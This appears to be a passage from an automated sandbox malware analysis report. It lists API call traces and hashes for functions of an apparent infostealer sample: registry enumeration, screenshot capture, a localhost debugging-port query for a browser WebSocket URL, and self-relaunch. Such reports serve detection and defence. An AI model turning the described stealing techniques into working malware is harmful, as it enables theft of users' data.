                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B587
                                  • lstrlen.KERNEL32(00374AD4), ref: 0034B5FE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B622
                                  • lstrcat.KERNEL32(00000000,00374AD4), ref: 0034B62E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B65E
                                  • lstrlen.KERNEL32(?), ref: 0034B767
                                  • lstrlen.KERNEL32(?), ref: 0034B776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B79E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: c43dc13082715fe815276f8cd85071462b2e2e18d17de9a36b75939d797be789
                                  • Instruction ID: 772aabd8214ebed51a68db897e2ed7b45295fbd6ede7e667f70d1e8257e3f944
                                  • Opcode Fuzzy Hash: c43dc13082715fe815276f8cd85071462b2e2e18d17de9a36b75939d797be789
                                  • Instruction Fuzzy Hash: 5E028330A01205CFCB26DF65D888B6AF7F5AF55304F1A8069E8099F361DB35EC96DB90
                                  Function 00363760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003671FE
                                  • RegOpenKeyExA.ADVAPI32(?,00FAA090,00000000,00020019,?), ref: 003637BD
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 003637F7
                                  • wsprintfA.USER32 ref: 00363822
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00363840
                                  • RegCloseKey.ADVAPI32(?), ref: 0036384E
                                  • RegCloseKey.ADVAPI32(?), ref: 00363858
                                  • RegQueryValueExA.ADVAPI32(?,00FAD958,00000000,000F003F,?,?), ref: 003638A1
                                  • lstrlen.KERNEL32(?), ref: 003638B6
                                  • RegQueryValueExA.ADVAPI32(?,00FADAA8,00000000,000F003F,?,00000400), ref: 00363927
                                  • RegCloseKey.ADVAPI32(?), ref: 00363972
                                  • RegCloseKey.ADVAPI32(?), ref: 00363989
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 13140697-3278919252
                                  • Opcode ID: f6fa042174991fc2923e877d39e40b1490e7a70b06806459164b2f17006f07e2
                                  • Instruction ID: d9445bdc17decb7d7701c5336a32519a3a60e9b540faf7a2a14ba823bbc95ce6
                                  • Opcode Fuzzy Hash: f6fa042174991fc2923e877d39e40b1490e7a70b06806459164b2f17006f07e2
                                  • Instruction Fuzzy Hash: D491CC729002089FCB11DFA4DC84AEEB7B9FB48314F15C569F509AB215DB31AE85DFA0
                                  Function 003490C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenA.WININET(0036CFEC,00000001,00000000,00000000,00000000), ref: 003490DF
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003490FC
                                  • InternetCloseHandle.WININET(00000000), ref: 00349109
                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 00349166
                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00349197
                                  • InternetCloseHandle.WININET(00000000), ref: 003491A2
                                  • InternetCloseHandle.WININET(00000000), ref: 003491A9
                                  • strlen.MSVCRT ref: 003491BA
                                  • strlen.MSVCRT ref: 003491ED
                                  • strlen.MSVCRT ref: 0034922E
                                  • strlen.MSVCRT ref: 0034924C
                                    • Part of subcall function 00348980: std::_Xinvalid_argument.LIBCPMT ref: 00348996
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 1530259920-2144369209
                                  • Opcode ID: 99132a768105540de0bb92e0d0ef56e8866f0c1102fa5aad7a32b75ea9d14b12
                                  • Instruction ID: 58f93c7e6ee90de61541002ff6a29de103f51a93fbb18339a6ba235ff8bb7270
                                  • Opcode Fuzzy Hash: 99132a768105540de0bb92e0d0ef56e8866f0c1102fa5aad7a32b75ea9d14b12
                                  • Instruction Fuzzy Hash: 0D511871650205ABDB21DFA8EC45FEEF7F9DB48310F044069F904EB280DBB4EA4897A1
                                  Function 00361660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 003616A1
                                  • lstrcpy.KERNEL32(00000000,00F9B1E8), ref: 003616CC
                                  • lstrlen.KERNEL32(?), ref: 003616D9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003616F6
                                  • lstrcat.KERNEL32(00000000,?), ref: 00361704
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0036172A
                                  • lstrlen.KERNEL32(00FACCA8), ref: 0036173F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00361762
                                  • lstrcat.KERNEL32(00000000,00FACCA8), ref: 0036176A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361792
                                  • ShellExecuteEx.SHELL32(?), ref: 003617CD
                                  • ExitProcess.KERNEL32 ref: 00361803
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                  • String ID: <
                                  • API String ID: 3579039295-4251816714
                                  • Opcode ID: aa5907fde7113306278918ebaeb6ef17986668f824439a6626f2dcdeb724e339
                                  • Instruction ID: 2cd236889bccb7e1f525584c7fe080b9ac940949a01c27c493eb5e0b77ccb279
                                  • Opcode Fuzzy Hash: aa5907fde7113306278918ebaeb6ef17986668f824439a6626f2dcdeb724e339
                                  • Instruction Fuzzy Hash: 6F51D571D0121AABCB12DFA4DC88A9EB7F9AF58300F454025F909E7354DF30AE45DBA0
                                  Function 0035EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035EFE4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035F012
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0035F026
                                  • lstrlen.KERNEL32(00000000), ref: 0035F035
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 0035F053
                                  • StrStrA.SHLWAPI(00000000,?), ref: 0035F081
                                  • lstrlen.KERNEL32(?), ref: 0035F094
                                  • lstrlen.KERNEL32(00000000), ref: 0035F0B2
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 0035F0FF
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 0035F13F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$AllocLocal
                                  • String ID: ERROR
                                  • API String ID: 1803462166-2861137601
                                  • Opcode ID: c08b3663a9fc04e1cc9cb98d8e9760f3a2fa5836b85f8421673697de5071017d
                                  • Instruction ID: 7f9ce78fb34a48f1af1270aa3fbd7a26bdf718ed96ecece8fd57352500b1594f
                                  • Opcode Fuzzy Hash: c08b3663a9fc04e1cc9cb98d8e9760f3a2fa5836b85f8421673697de5071017d
                                  • Instruction Fuzzy Hash: 9C516C319206059FCB23AF74DC49EAB77E5AF55301F454068FC4AAF262DB30ED558BA0
                                  Function 0034A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentVariableA.KERNEL32(00FA8A18,00579BD8,0000FFFF), ref: 0034A026
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034A053
                                  • lstrlen.KERNEL32(00579BD8), ref: 0034A060
                                  • lstrcpy.KERNEL32(00000000,00579BD8), ref: 0034A08A
                                  • lstrlen.KERNEL32(00374C4C), ref: 0034A095
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034A0B2
                                  • lstrcat.KERNEL32(00000000,00374C4C), ref: 0034A0BE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034A0E4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034A0EF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034A114
                                  • SetEnvironmentVariableA.KERNEL32(00FA8A18,00000000), ref: 0034A12F
                                  • LoadLibraryA.KERNEL32(00FAD3D0), ref: 0034A143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2929475105-0
                                  • Opcode ID: bfda316d1575af30ba64d294950cede3fd6ba2cd7d7d45176ddf8d45adcc3579
                                  • Instruction ID: aa84f8a944c3fb26b1261a39cafc2309e1bc9d4b076e5e6d44f616b146683d31
                                  • Opcode Fuzzy Hash: bfda316d1575af30ba64d294950cede3fd6ba2cd7d7d45176ddf8d45adcc3579
                                  • Instruction Fuzzy Hash: E891C571680E019FD7329FA4EC48A7637E9EB68714F414458F8098F251EFB5EC84EB92
                                  Function 0035C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035C8A2
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035C8D1
                                  • lstrlen.KERNEL32(00000000), ref: 0035C8FC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035C932
                                  • StrCmpCA.SHLWAPI(00000000,00374C3C), ref: 0035C943
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 42f74cd1f405196e9073a48bcb58bc9364736177391165e5bcae8403f0008c5d
                                  • Instruction ID: e1bb2d8ba67c259e4d3931c320e0f636a3b4b36424350d99348b392750f955bd
                                  • Opcode Fuzzy Hash: 42f74cd1f405196e9073a48bcb58bc9364736177391165e5bcae8403f0008c5d
                                  • Instruction Fuzzy Hash: 5D61B071D21319AFCB12EFB49C48EAE7BF8AF19305F015469EC45EB211D7349949CBA0
                                  Function 003641E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00360CF0), ref: 00364276
                                  • GetDesktopWindow.USER32 ref: 00364280
                                  • GetWindowRect.USER32(00000000,?), ref: 0036428D
                                  • SelectObject.GDI32(00000000,00000000), ref: 003642BF
                                  • GetHGlobalFromStream.COMBASE(00360CF0,?), ref: 00364336
                                  • GlobalLock.KERNEL32(?), ref: 00364340
                                  • GlobalSize.KERNEL32(?), ref: 0036434D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                  • String ID:
                                  • API String ID: 1264946473-0
                                  • Opcode ID: f9abfbd7959c8524a725759e7f703c65313dca98d2d3538ba266f20d83208fd0
                                  • Instruction ID: 16f2e5b7d63368f2f8e3fa89126f64287155d6c88a246516783da995428d6ebe
                                  • Opcode Fuzzy Hash: f9abfbd7959c8524a725759e7f703c65313dca98d2d3538ba266f20d83208fd0
                                  • Instruction Fuzzy Hash: 39513E75A10208AFDB11EFA4EC89EEEB7B9EF58310F104419F905E7250DB34AD45DBA0
                                  Function 0035DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,00FADF28), ref: 0035E00D
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0035E037
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035E07D
                                  • lstrcat.KERNEL32(?,?), ref: 0035E098
                                  • lstrcat.KERNEL32(?,?), ref: 0035E0AC
                                  • lstrcat.KERNEL32(?,00F9AF90), ref: 0035E0C0
                                  • lstrcat.KERNEL32(?,?), ref: 0035E0D4
                                  • lstrcat.KERNEL32(?,00FAD4B0), ref: 0035E0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0035E126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
